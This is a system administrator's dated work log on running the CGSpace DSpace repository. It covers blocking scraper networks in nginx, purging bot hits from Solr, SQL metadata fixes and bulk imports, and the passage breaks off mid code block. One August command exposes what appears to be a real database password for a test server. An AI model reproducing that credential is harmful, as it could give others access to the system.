- Linode told me that CGSpace had high load yesterday
- I also got some up and down notices from UptimeRobot
- Looking now, I see there was a very high CPU and database pool load, but a mostly normal DSpace session count
![CPU load day](/cgspace-notes/2022/07/cpu-day.png)
![JDBC pool day](/cgspace-notes/2022/07/jmx_tomcat_dbpools-day.png)
- Seems we have some old database transactions since 2022-06-27:
![PostgreSQL locks week](/cgspace-notes/2022/07/postgres_locks_ALL-week.png)
![PostgreSQL query length week](/cgspace-notes/2022/07/postgres_querylength_ALL-week.png)
- Looking at the top connections to nginx yesterday:
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.1 | sort | uniq -c | sort -h | tail
1132 64.124.8.34
1146 2a01:4f8:1c17:5550::1
1380 137.184.159.211
1533 64.124.8.59
4013 80.248.237.167
4776 54.195.118.125
10482 45.5.186.2
11177 172.104.229.92
15855 2a01:7e00::f03c:91ff:fe9a:3a37
22179 64.39.98.251
```
- And the total number of unique IPs:
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.1 | sort -u | wc -l
6952
```
- This seems low, so it must have been from the request patterns by certain visitors
- 64.39.98.251 is Qualys, and I'm debating blocking [all their IPs](https://pci.qualys.com/static/help/merchant/getting_started/check_scanner_ip_addresses.htm) using a geo block in nginx (need to test)
- The top few are known ILRI and other CGIAR scrapers, but 80.248.237.167 is on InternetVikings in Sweden, using a normal user agentand scraping Discover
- 64.124.8.59 is making requests with a normal user agent and belongs to Castle Global or Zayo
- I ran all system updates and rebooted the server (could have just restarted PostgreSQL but I thought I might as well do everything)
- I implemented a geo mapping for the user agent mapping AND the nginx `limit_req_zone` by extracting the networks into an external file and including it in two different geo mapping blocks
- This is clever and relies on the fact that we can use defaults in both cases
- First, we map the user agent of requests from these networks to "bot" so that Tomcat and Solr handle them accordingly
- Second, we use this as a key in a `limit_req_zone`, which relies on a default mapping of '' (and nginx doesn't evaluate empty cache keys)
- I noticed that CIP uploaded a number of Georgian presentations with `dcterms.language` set to English and Other so I changed them to "ka"
- Perhaps we need to update our list of languages to include all instead of the most common ones
- I wrote a script `ilri/iso-639-value-pairs.py` to extract the names and Alpha 2 codes for all ISO 639-1 languages from pycountry and added them to `input-forms.xml`
## 2022-07-06
- CGSpace went down and up a few times due to high load
- I found one host in Romania making very high speed requests with a normal user agent (`Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C`):
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | sort | uniq -c | sort -h | tail -n 10
516 142.132.248.90
525 157.55.39.234
587 66.249.66.21
593 95.108.213.59
1372 137.184.159.211
4776 54.195.118.125
5441 205.186.128.185
6267 45.5.186.2
15839 2a01:7e00::f03c:91ff:fe9a:3a37
36114 146.19.75.141
```
- I added 146.19.75.141 to the list of bot networks in nginx
- While looking at the logs I started thinking about Bing again
- They apparently [publish a list of all their networks](https://www.bing.com/toolbox/bingbot.json)
- I wrote a script to use `prips` to [print the IPs for each network](https://stackoverflow.com/a/52501093/1996540)
- The script is `bing-networks-to-ips.sh`
- From Bing's IPs alone I purged 145,403 hits... sheesh
- Delete two items on CGSpace for Margarita because she was getting the "Authorization denied for action OBSOLETE (DELETE) on BITSTREAM:0b26875a-..." error
- This is the same DSpace 6 bug I noticed in 2021-03, 2021-04, and 2021-05
- Update some `cg.audience` metadata to use "Academics" instead of "Academicians":
```console
dspace=# UPDATE metadatavalue SET text_value='Academics' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value='Academicians';
UPDATE 104
```
- I will also have to remove "Academicians" from input-forms.xml
## 2022-07-07
- Finalize lists of non-AGROVOC subjects in CGSpace that I started last week
- I used the [SQL helper functions](https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+6) to find the collections where each term was used:
```console
localhost/dspace= ☘ SELECT DISTINCT(ds6_item2collectionhandle(dspace_object_id)) AS collection, COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND LOWER(text_value) = 'water demand' GROUP BY collection ORDER BY count DESC LIMIT 5;
collection │ count
─────────────┼───────
10568/36178 │ 56
10568/36185 │ 46
10568/36181 │ 35
10568/36188 │ 28
10568/36179 │ 21
(5 rows)
```
- For now I only did terms from my list that had 100 or more occurrences in CGSpace
- This leaves us with thirty-six terms that I will send to Sara Jani and Elizabeth Arnaud for evaluating possible inclusion to AGROVOC
- Write to some submitters from CIAT, Bioversity, and CCAFS to ask if they are still uploading new items with their legacy subject fields on CGSpace
- We want to remove them from the submission form to create space for new fields
- Update one term I noticed people using that was close to AGROVOC:
```console
dspace=# UPDATE metadatavalue SET text_value='development policies' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value='development policy';
UPDATE 108
```
- After contacting some editors I removed some old metadata fields from the submission form and browse indexes:
- Bioversity subject (`cg.subject.bioversity`)
- CCAFS phase 1 project tag (`cg.identifier.ccafsproject`)
- CIAT project tag (`cg.identifier.ciatproject`)
- CIAT subject (`cg.subject.ciat`)
- Work on cleaning and proofing forty-six AfricaRice items for CGSpace
- Last week we identified some duplicates so I removed those
- The data is of mediocre quality
- I've been fixing citations (nitpick), adding licenses, adding volume/issue/extent, fixing DOIs, and adding some AGROVOC subjects
- I even found titles that have typos, looking something like OCR errors...
## 2022-07-08
- Finalize the cleaning and proofing of AfricaRice records
- I found two suspicious items that claim to have been published but I can't find in the respective journals, so I removed those
- I uploaded the forty-four items to [DSpace Test](https://dspacetest.cgiar.org/handle/10568/119135)
- Margarita from CCAFS said they are no longer using the CCAFS subject or CCAFS phase 2 project tag
- I removed these from the input-form.xml and Discovery facets:
- cg.identifier.ccafsprojectpii
- cg.subject.cifor
- For now we will keep them in the search filters
- I modified my `check-duplicates.py` script a bit to fix a logic error for deleted items and add similarity scores from spacy (see: https://stackoverflow.com/questions/8897593/how-to-compute-the-similarity-between-two-text-documents)
- I want to use this with the MARLO innovation reports, to find related publications and working papers on CGSpace
- I am curious to see how the similarity scores compare to those from trgm... perhaps we don't need them actually
- Deploy latest changes to submission form, Discovery, and browse on CGSpace
- Also run all system updates and reboot the host
- Fix 152 `dcterms.relation` that are using "cgspace.cgiar.org" links instead of handles:
```console
UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '.*cgspace\.cgiar\.org/handle/(\d+/\d+)$', 'https://hdl.handle.net/\1') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=180 AND text_value ~ 'cgspace\.cgiar\.org/handle/\d+/\d+$';
```
## 2022-07-10
- UptimeRobot says that CGSpace is down
- I see high load around 22, high CPU around 800%
- Doesn't seem to be a lot of unique IPs:
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | sort -u | wc -l
2243
```
Looking at the top twenty I see some usual IPs, but some new ones on Hetzner that are using many DSpace sessions:
```console
$ grep 65.109.2.97 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
1613
$ grep 95.216.174.97 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
1696
$ grep 65.109.15.213 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
1708
$ grep 65.108.80.78 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
1830
$ grep 65.108.95.23 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
1811
```
![DSpace sessions week](/cgspace-notes/2022/07/jmx_dspace_sessions-week.png)
- These IPs are using normal-looking user agents:
- `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.9) Gecko/20100101 Goanna/4.1 Firefox/52.9 PaleMoon/28.0.0.1`
- `Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/45.0"`
- `Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:56.0) Gecko/20100101 Firefox/56.0.1 Waterfox/56.0.1`
- `Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.85 Safari/537.36`
- I will add networks I'm seeing now to nginx's bot-networks.conf for now (not all of Hetzner) and purge the hits later:
- 65.108.0.0/16
- 65.21.0.0/16
- 95.216.0.0/16
- 135.181.0.0/16
- 138.201.0.0/16
- I think I'm going to get to a point where I categorize all commercial subnets as bots by default and then whitelist those we need
- Sheesh, there are a bunch more IPv6 addresses also on Hetzner:
```console
# awk '{print $1}' /var/log/nginx/{access,library-access}.log | sort | grep 2a01:4f9 | uniq -c | sort -h
1 2a01:4f9:6a:1c2b::2
2 2a01:4f9:2b:5a8::2
2 2a01:4f9:4b:4495::2
96 2a01:4f9:c010:518c::1
137 2a01:4f9:c010:a9bc::1
142 2a01:4f9:c010:58c9::1
142 2a01:4f9:c010:58ea::1
144 2a01:4f9:c010:58eb::1
145 2a01:4f9:c010:6ff8::1
148 2a01:4f9:c010:5190::1
149 2a01:4f9:c010:7d6d::1
153 2a01:4f9:c010:5226::1
156 2a01:4f9:c010:7f74::1
160 2a01:4f9:c010:5188::1
161 2a01:4f9:c010:58e5::1
168 2a01:4f9:c010:58ed::1
170 2a01:4f9:c010:548e::1
170 2a01:4f9:c010:8c97::1
175 2a01:4f9:c010:58c8::1
175 2a01:4f9:c010:aada::1
182 2a01:4f9:c010:58ec::1
182 2a01:4f9:c010:ae8c::1
502 2a01:4f9:c010:ee57::1
530 2a01:4f9:c011:567a::1
535 2a01:4f9:c010:d04e::1
539 2a01:4f9:c010:3d9a::1
586 2a01:4f9:c010:93db::1
593 2a01:4f9:c010:a04a::1
601 2a01:4f9:c011:4166::1
607 2a01:4f9:c010:9881::1
640 2a01:4f9:c010:87fb::1
648 2a01:4f9:c010:e680::1
1141 2a01:4f9:3a:2696::2
1146 2a01:4f9:3a:2555::2
3207 2a01:4f9:3a:2c19::2
```
- Maybe it's time I ban all of Hetzner... sheesh.
- I left for a few hours and the server was going up and down the whole time, still very high CPU and database when I got back
![CPU day](/cgspace-notes/2022/07/cpu-day.png)
- I am not sure what's going on
- I extracted all the IPs and used `resolve-addresses-geoip2.py` to analyze them and extract all the Hetzner networks and block them
- It's 181 IPs on Hetzner...
- I rebooted the server to see if it was just some stuck locks in PostgreSQL...
- The load is still higher than I would expect, and after a few more hours I see more Hetzner IPs coming through? Two more subnets to block
- Start a harvest on AReS
## 2022-07-12
- Update an incorrect ORCID identifier for Alliance
- Adjust collection permissions on CIFOR publications collection so Vika can submit without approval
## 2022-07-14
- Someone on the DSpace Slack mentioned having issues with the database configuration in DSpace 7.3
- The reason is apparently that the default `db.dialect` changed from "org.dspace.storage.rdbms.hibernate.postgres.DSpacePostgreSQL82Dialect" to "org.hibernate.dialect.PostgreSQL94Dialect" as a result of a Hibernate update
- Then I was getting more errors starting the backend server in Tomcat, but the issue was that the backend server needs Solr to be up first!
## 2022-07-17
- Start a harvest on AReS around 3:30PM
- Later in the evening I see CGSpace was going down and up (not as bad as last Sunday) with around 18.0 load...
- I see very high CPU usage:
![CPU day](/cgspace-notes/2022/07/cpu-day2.png)
- But DSpace sessions are normal (not like last weekend):
![DSpace sessions week](/cgspace-notes/2022/07/jmx_dspace_sessions-week2.png)
- I see some Hetzner IPs in the top users today, but most of the requests are getting HTTP 503 because of the changes I made last week
- I see 137.184.159.211, which is on Digital Ocean, and the DNS is apparently iitawpsite.iita.org
- I've seen their user agent before, but I don't think I knew it was IITA: "GuzzleHttp/6.3.3 curl/7.84.0 PHP/7.4.30"
- I already have something in nginx to mark Guzzle as a bot, but interestingly it shows up in Solr as `$http_user_agent` so there is a logic error in my nginx config
- Ouch, the logic error seems to be this:
```console
geo $ua {
default $http_user_agent;
include /etc/nginx/bot-networks.conf;
}
```
- After some testing on DSpace Test I see that this is actually setting the default user agent to a literal `$http_user_agent`
- The [nginx map docs](http://nginx.org/en/docs/http/ngx_http_map_module.html) say:
> The resulting value can contain text, variable (0.9.0), and their combination (1.11.0).
- But I can't get it to work, neither for the default value or for matching my IP...
- I will have to ask on the nginx mailing list
- The total number of requests and unique hosts was not even very high (below here around midnight so is almost all day):
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | sort -u | wc -l
2776
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | wc -l
40325
```
## 2022-07-18
- Reading more about nginx's geo/map and doing some tests on DSpace Test, it appears that the [geo module cannot do dynamic values](https://stackoverflow.com/questions/47011497/nginx-geo-module-wont-use-variables)
- So this issue with the literal `$http_user_agent` is due to the geo block I put in place earlier this month
- I reworked the logic so that the geo block sets "bot" or and empty string when a network matches or not, and then re-use that value in a mapping that passes through the host's user agent in case geo has set it to an empty string
- This allows me to accomplish the original goal while still only using one bot-networks.conf file for the `limit_req_zone` and the user agent mapping that we pass to Tomcat
- Unfortunately this means I will have hundreds of thousands of requests in Solr with a literal `$http_user_agent`
- I might try to purge some by enumerating all the networks in my block file and running them through `check-spider-ip-hits.sh`
- I extracted all the IPs/subnets from `bot-networks.conf` and prepared them so I could enumerate their IPs
- I had to add `/32` to all single IPs, which I did with this crazy vim invocation:
```console
:g!/\/\d\+$/s/^\(\d\+\.\d\+\.\d\+\.\d\+\)$/\1\/32/
```
- Explanation:
- `g!`: global, lines *not* matching (the opposite of `g`)
- `/\/\d\+$/`, pattern matching `/` with one or more digits at the end of the line
- `s/^\(\d\+\.\d\+\.\d\+\.\d\+\)$/\1\/32/`, for lines not matching above, capture the IPv4 address and add `/32` at the end
- Then I ran the list through prips to enumerate the IPs:
```console
$ while read -r line; do prips "$line" | sed -e '1d; $d'; done < /tmp/bot-networks.conf > /tmp/bot-ips.txt
$ wc -l /tmp/bot-ips.txt
1946968 /tmp/bot-ips.txt
```
- I started running `check-spider-ip-hits.sh` with the 1946968 IPs and left it running in dry run mode
## 2022-07-19
- Patrizio and Fabio emailed me to ask if their IP was banned from CGSpace
- It's one of the Hetzner ones so I said yes definitely, and asked more about how they are using the API
- Add ORCID identifer for Ram Dhulipala, Lilian Wambua, and Dan Masiga to CGSpace and tag them and some other existing items:
```console
dc.contributor.author,cg.creator.identifier
"Dhulipala, Ram K","Ram Dhulipala: 0000-0002-9720-3247"
"Dhulipala, Ram","Ram Dhulipala: 0000-0002-9720-3247"
"Dhulipala, R.","Ram Dhulipala: 0000-0002-9720-3247"
"Wambua, Lillian","Lillian Wambua: 0000-0003-3632-7411"
"Wambua, Lilian","Lillian Wambua: 0000-0003-3632-7411"
"Masiga, D.K.","Daniel Masiga: 0000-0001-7513-0887"
"Masiga, Daniel K.","Daniel Masiga: 0000-0001-7513-0887"
"Jores, Joerg","Joerg Jores: 0000-0003-3790-5746"
"Schieck, Elise","Elise Schieck: 0000-0003-1756-6337"
"Schieck, Elise G.","Elise Schieck: 0000-0003-1756-6337"
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-07-19-add-orcids.csv -db dspace -u dspace -p 'fuuu'
```
- Review the AfricaRice records from earlier this month again
- I found one more duplicate and one more suspicious item, so the total after removing those is now forty-two
- I took all the ~560 IPs that had hits so far in `check-spider-ip-hits.sh` above (about 270,000 into the list of 1946968 above) and ran them directly on CGSpace
- This purged 199,032 hits from Solr, very many of which were from Qualys, but also that Chinese bot on 124.17.34.0/24 that was grabbing PDFs a few years ago which I blocked in nginx, but never purged the hits from
- Then I deleted all IPs up to the last one where I found hits in the large file of 1946968 IPs and re-started the script
## 2022-07-20
- Did a few more minor edits to the forty-two AfricaRice records (including generating thumbnails for the handful that are Creative Commons licensed) then did a test import on my local instance
- Once it worked well I did an import to CGSpace:
```console
$ dspace import -a -e fuuu@example.com -m 2022-07-20-africarice.map -s /tmp/SimpleArchiveFormat
```
- Also make edits to ~62 affiliations on CGSpace because I noticed they were messed up
- Extract another ~1,600 IPs that had hits since I started the second round of `check-spider-ip-hits.sh` yesterday and purge another 303,594 hits
- This is about 999846 into the original list of 1946968 from yesterday
- A metric fuck ton of the IPs in this batch were from Hetzner
## 2022-07-21
- Extract another ~2,100 IPs that had hits since I started the third round of `check-spider-ip-hits.sh` last night and purge another 763,843 hits
- This is about 1441221 into the original list of 1946968 from two days ago
- Again these are overwhelmingly Hetzner (not surprising since my bot-networks.conf file in nginx is mostly Hetzner)
- I responded to my original request to Atmire about the log4j to reload4j migration in DSpace 6.4
- I had initially requested a comment from them in 2022-05
- Extract another ~1,200 IPs that had hits from the fourth round of `check-spider-ip-hits.sh` earlier today and purge another 74,591 hits
- Now the list of IPs I enumerated from the nginx `bot-networks.conf` is finished
## 2022-07-22
- I created a new Linode instance for testing DSpace 7
- Jose from the CCAFS team sent me the final versions of 3,500+ Innovations, Policies, MELIAs, and OICRs from MARLO
- I re-synced CGSpace with DSpace Test so I can have a newer snapshot of the production data there for testing the CCAFS MELIAs, OICRs, Policies, and Innovations
- I re-created the tip-submit and tip-approve DSpace user accounts for Alliance's new TIP submit tool and added them to the Alliance submitters and Alliance admins accounts respectively
- Start working on updating the Ansible infrastructure playbooks for DSpace 7 stuff
## 2022-07-23
- Start a harvest on AReS
- More work on DSpace 7 related issues in the [Ansible infrastructure playbooks](https://github.com/ilri/rmg-ansible-public)
## 2022-07-24
- More work on DSpace 7 related issues in the [Ansible infrastructure playbooks](https://github.com/ilri/rmg-ansible-public)
## 2022-07-25
- More work on DSpace 7 related issues in the [Ansible infrastructure playbooks](https://github.com/ilri/rmg-ansible-public)
- I see that, for Solr, we will need to copy the DSpace configsets to the writable data directory rather than the default home dir
- The [Taking Solr to production guide](https://solr.apache.org/guide/8_11/taking-solr-to-production.html) recommends keeping the unzipped code separate from the data, which we do in our Solr role already
- So that means we keep the unzipped code in `/opt/solr-8.11.2`, but the data directory in `/var/solr/data`, with the DSpace Solr cores here `/var/solr/data/configsets`
- I'm not sure how to integrate that into my playbooks yet
- Much to my surprise, Discovery indexing on DSpace 7 was really fast when I did it just now, apparently taking 40 minutes of wall clock time?!:
```console
$ /usr/bin/time -v /home/dspace7/bin/dspace index-discovery -b
The script has started
(Re)building index from scratch.
Done with indexing
The script has completed
Command being timed: "/home/dspace7/bin/dspace index-discovery -b"
User time (seconds): 588.18
System time (seconds): 91.26
Percent of CPU this job got: 28%
Elapsed (wall clock) time (h:mm:ss or m:ss): 40:05.79
Average shared text size (kbytes): 0
Average unshared data size (kbytes): 0
Average stack size (kbytes): 0
Average total size (kbytes): 0
Maximum resident set size (kbytes): 635380
Average resident set size (kbytes): 0
Major (requiring I/O) page faults: 1513
Minor (reclaiming a frame) page faults: 216412
Voluntary context switches: 1671092
Involuntary context switches: 744007
Swaps: 0
File system inputs: 4396880
File system outputs: 74312
Socket messages sent: 0
Socket messages received: 0
Signals delivered: 0
Page size (bytes): 4096
Exit status: 0
```
- Leroy from the Alliance wrote to say that the CIAT Library is back up so I might be able to download all the PDFs
- It had been shut down for a security reason a few months ago and we were planning to download them all and attach them to their relevant items on CGSpace
- I noticed one item that had the PDF already on CGSpace so I'll need to consider that when I eventually do the import
- I had to re-create the tip-submit and tip-approve accounts for Alliance on DSpace Test again
- After I created them last week they somehow got deleted...?!... I couldn't find them or the mel-submit account either!
## 2022-07-26
- Rafael from Alliance wrote to say that the tip-submit account wasn't working on DSpace Test
- I think I need to have the submit account in the *Alliance admin* group in order for it to be able to submit via the REST API, but yesterday I had added it to the submitters group
- Meeting with Peter and Abenet about CGSpace issues
- We want to do a training with IFPRI ASAP
- Then we want to start bringing the comms people from the Initiatives in
- We also want to revive the Metadata Working Group to have discussions about metadata standards, governance, etc
- We walked through DSpace 7.3 to get an idea of what vanilla looks like and start thinking about UI, item display, etc (perhaps we solicit help from some CG centers on Angular?)
- Start looking at the metadata for the 1,637 Innovations that Jose sent last week
- There are still issues with the citation formatting, but I will just fix it instead of asking him again
- I can use these GREL to fix the spacing around "Annual Report2017" and the periods:
```console
value.replace(/Annual Report(\d{4})/, "Annual Report $1")
value.replace(/ \./, ".")
```
- Then there are also some other issues with the metadata that I sent to him for comments
- I managed to get DSpace 7 running behind nginx, and figured out how to change the logo to CGIAR and run a local instance using the remote API
## 2022-07-27
- Work on the MARLO Innovations and MELIA
- I had to ask Jose for some clarifications and correct some encoding issues (for example in Côte d'Ivoire all over the place, and weird periods everywhere)
- Work on the DSpace 7.3 theme, mimicking CGSpace's DSpace 6 them pretty well for now
## 2022-07-28
- Work on the MARLO Innovations
- I had to ask Jose more questions about character encoding and duplicates
- I added a new feature to [csv-metadata-quality](https://github.com/ilri/csv-metadata-quality) to add missing regions to the region column when it is detected that there is a country with missing regions
## 2022-07-30
- Start a full harvest on AReS
<!-- vim: set sw=2 ts=2: -->

347
content/posts/2022-08.md Normal file
View File

@ -0,0 +1,347 @@
---
title: "August, 2022"
date: 2022-08-01T10:22:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-08-01
- Our request to add [CC-BY-3.0-IGO to SPDX](https://github.com/spdx/license-list-XML/issues/1525) was approved a few weeks ago
<!--more-->
## 2022-08-02
- Resume working on the MARLO Innovations
- Last week Jose had sent me an updated CSV with UTF-8 formatting, which was missing the filename column
- I joined it with the older file (stripped down to just the `cg.number` and `filename` columns and then did the same cleanups I had done last week
- I noticed there are six PDFs unused, so I asked Jose
- Spent some time trying to understand the REST API submission issues that Rafael from CIAT is having with tip-approve and tip-submit
- First, according to my notes in 2020-10, a user must be a *collection admin* in order to submit via the REST API
- Second, a collection must have a "Accept/Reject/Edit Metadata" step defined in the workflow
- Also, I referenced my notes from this gist I had made for exactly this purpose! https://gist.github.com/alanorth/40fc3092aefd78f978cca00e8abeeb7a
## 2022-08-03
- I came up with an interesting idea to add missing countries and AGROVOC terms to the MARLO Innovation metadata
- I copied the abstract column to two new fields: `countrytest` and `agrovoctest` and then used this Jython code as a transform to drop terms that don't match (using CGSpace's country list and list of 1,400 AGROVOC terms):
```python
with open(r"/tmp/cgspace-countries.txt",'r') as f :
countries = [name.rstrip().lower() for name in f]
return "||".join([x for x in value.split(' ') if x.lower() in countries])
```
- Then I joined them with the other country and AGROVOC columns
- I had originally tried to use csv-metadata-quality to look up and drop invalid AGROVOC terms but it was timing out ever dozen or so requests
- Then I briefly tried to use lightrdf to export a text file of labels from AGROVOC's RDF, but I couldn't figure it out
- I just realized this will not match countries with spaces in our cell value, ugh... and Jython has weird syntax and errors and I can't get normal Python code to work here, I'm missing something
- Then I extracted the titles, dates, and types and added IDs, then ran them through `check-duplicates.py` to find the existing items on CGSpace so I can add them as `dcterm.relation` links
```console
$ csvcut -l -c dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-08-03-Innovations-Cleaned.csv | sed '1s/line_number/id/' > /tmp/innovations-temp.csv
$ ./ilri/check-duplicates.py -i /tmp/innovations-temp.csv -u dspacetest -db dspacetest -p 'dom@in34sniper' -o /tmp/ccafs-duplicates.csv
```
- There were about 115 with existing items on CGSpace
- Then I did some minor processing and checking of the duplicates file (for example, some titles appear more than once in both files), and joined with the other file (left join):
```console
$ csvjoin --left -c dc.title ~/Downloads/2022-08-03-Innovations-Cleaned.csv ~/Downloads/2022-08-03-Innovations-relations.csv > /tmp/innovations-with-relations.csv
```
- Then I used SAFBuilder to create a SimpleItemArchive and import to DSpace Test:
```console
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
$ dspace import --add --eperson=fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-08-03-innovations.map
```
- Meeting with Mohammed Salem about harmonizing MEL and CGSpace metadata fields
- I still need to share our results and recommendations with Peter, Enrico, Sara, Svetlana, et al
- I made some minor fixes to csv-metadata-quality while working on the MARLO CRP Innovations
## 2022-08-05
- I discussed issues with the DSpace 7 submission forms on Slack and Mark Wood found that the migration tool creates a non-working submission form
- After updating the class name of the collection step and removing the "complete" and "sample" steps the submission form was working
- Now the issue is that the controlled vocabularies show up like this:
![Controlled vocabulary bug in DSpace 7](/cgspace-notes/2022/08/dspace7-submission.png)
- I think we need to add IDs, I will have to check what the implications of that are
- Note (2022-09-27): see this related change from DSpace 7.3: https://github.com/DSpace/DSpace/pull/8174
- Emilio contacted me last week to say they have re-worked their harvester on Hetzner to use a new user agent: `AICCRA website harvester`
- I verified that I see it in the REST API logs, but I don't see any new stats hits for it
- I do see 11,000 hits from that IP last month when I had the incorrect nginx configuration that was sending a literal `$http_user_agent` so I purged those
- It is lucky that we have `harvest` in the DSpace spider agent example file so Solr doesn't log these hits, nothing needed to be done in nginx
## 2022-08-13
- I noticed there was high load on CGSpace, around 9 or 10
- Looking at the Munin graphs it seems to just be the last two hours or so, with a slight increase in PostgreSQL connections, firewall traffic, and a more noticeable increase in CPU
- DSpace sessions are normal
- The number of unique hosts making requests to nginx is pretty low, though it's only 6AM in the server's time
- I see one IP in Sweden making a lot of requests with a normal user agent: 80.248.237.167
- This host is on Internet Vikings (INTERNETBOLAGET), and I see 140,000 requests from them in Solr
- I see reports of excessive scraping on AbuseIPDB.com
- I'm gonna add their 80.248.224.0/20 to the bot-networks.conf in nginx
- I will also purge all the hits from this IP in Solr statistics
- I also see the core.ac.uk bot making tens of thousands of requests today, but we are already tagging that as a bot in Tomcat's Crawler Session Manager valve, so they should be sharing a Tomcat session with other bots and not creating too many sessions
## 2022-08-15
- Start indexing on AReS
- Add CONSERVATION to ILRI subjects on CGSpace
- I see that AGROVOC has `conservation agriculture` and I suggested that we use that instead
## 2022-08-17
- Peter and Jose sent more feedback about the CRP Innovation records from MARLO
- We expanded the CRP names in the citation and removed the `cg.identifier.url` URLs because they are ugly and will stop working eventually
- The mappings of MARLO links will be done internally with the `cg.number` IDs like "IN-1119" and the Handle URIs
## 2022-08-18
- I talked to Jose about the CCAFS MARLO records
- He still hasn't finished re-processing the PDFs to update the internal MARLO links
- I started looking at the other records (MELIAs, OICRs, Policies) and found some minor issues in the MELIAs so I sent feedback to Jose
- On second thought, I opened the MELIAs file in OpenRefine and it looks OK, so this must have been a parsing issue in LibreOffice when I was checking the file (or perhaps I didn't use the correct quoting when importing)
- Import the original MELIA v2 CSV file into OpenRefine to fix encoding before processing with csvcut/csvjoin
- Then extract the IDs and filenames from the original V2 file and join with the UTF-8 file:
```console
$ csvcut -c 'cg.number (series/report No.)',File ~/Downloads/MELIA-Metadata-v2-csv.csv > MELIA-v2-IDs-Files.csv
$ csvjoin -c 'cg.number (series/report No.)' MELIAs\ metadata\ utf8\ 20220816_JM.csv MELIA-v2-IDs-Files.csv > MELIAs-UTF-8-with-files.csv
```
- Then I imported them into OpenRefine to start metadata cleaning and enrichment
- Make some minor changes to [cgspace-submission-guidelines](https://github.com/ilri/cgspace-submission-guidelines)
- Upgrade to Bootstrap v5.2.0
- Dedupe value pairs and controlled vocabularies before writing them
- Sort the controlled vocabularies before writing them (we don't do this for value pairs because some are added in specific order, like CRPs)
## 2022-08-19
- Peter Ballantyne sent me metadata for 311 Gender items that need to be duplicate checked on CGSpace before uploading
- I spent a half an hour in OpenRefine to fix the dates because they only had YYYY, but most abstracts and titles had more specific information about the date
- Then I checked for duplicates:
```console
$ ./ilri/check-duplicates.py -i ~/Downloads/gender-ppts-xlsx.csv -u dspace -db dspace -p 'fuuu' -o /tmp/gender-duplicates.csv
```
- I sent the list of ~130 possible duplicates to Peter to check
- Jose sent new versions of the MARLO Innovation/MELIA/OICR/Policy PDFs
- The idea was to replace tinyurl links pointing to MARLO, but I still see many tinyurl links, some of which point to CGIAR Sharepoint and require a login
- I asked them why they don't just use the original links in the first place in case tinyurl.com disappears
- I continued working on the MARLO MELIA v2 UTF-8 metadata
- I did the same metadata enrichment exercise to extract countries and AGROVOC subjects from the abstract field that I did earlier this month, using a Jython expression to match terms in copies of the abstract field
- It helps to replace some characters with spaces first with this GREL: `value.replace(/[.\/;(),]/, " ")`
- This caught some extra AGROVOC terms, but unfortunately we only check for single-word terms
- Then I checked for existing items on CGSpace matching these MELIA using my duplicate checker:
```console
$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-18-MELIAs-UTF-8-With-Files.csv -u dspace -db dspace -p 'fuuu' -o /tmp/melia-matches.csv
```
- Then I did some minor processing and checking of the duplicates file (for example, some titles appear more than once in both files), and joined with the other file (left join):
```console
$ xsv join --left id ~/Downloads/2022-08-18-MELIAs-UTF-8-With-Files.csv id ~/Downloads/melia-matches-csv.csv > /tmp/melias-with-relations.csv
```
- I had to use `xsv` because `csvcut` was throwing an error detecting the dialect of the input CSVs (?)
- I created a SAF bundle and imported the 749 MELIAs to DSpace Test
- I found thirteen items on CGSpace with dates in format "DD/MM/YYYY" so I fixed those
## 2022-08-20
- Peter sent me back the results of the duplicate checking on the Gender presentations
- There were only a handful of duplicates, so I used the IDs in the spreadsheet to flag and delete them in OpenRefine
- I had a new idea about matching AGROVOC subjects and countries in OpenRefine
- I was previously splitting up the text value field (title/abstract/etc) by spaces and searching for each word in the list of terms/countries like this:
```console
with open(r"/tmp/cgspace-countries.txt",'r') as f:
countries = [name.rstrip().lower() for name in f]
return "||".join([x for x in value.split(' ') if x.lower() in countries])
```
- But that misses multi-word terms/countries with spaces, so we can search the other way around by using a regex for each term/country and checking if it appears in the text value field:
```console
import re
with open(r"/tmp/agrovoc-subjects.txt",'r') as f:
terms = [name.rstrip().lower() for name in f]
return "||".join([term for term in terms if re.match(r".*\b" + term + r"\b.*", value.lower())])
```
- Now we are only limited by our small (~1,400) list of AGROVOC subjects, so I did an export from PostgreSQL of all `dcterms.subjects` values and am looking them up against AGROVOC's API right now:
```console
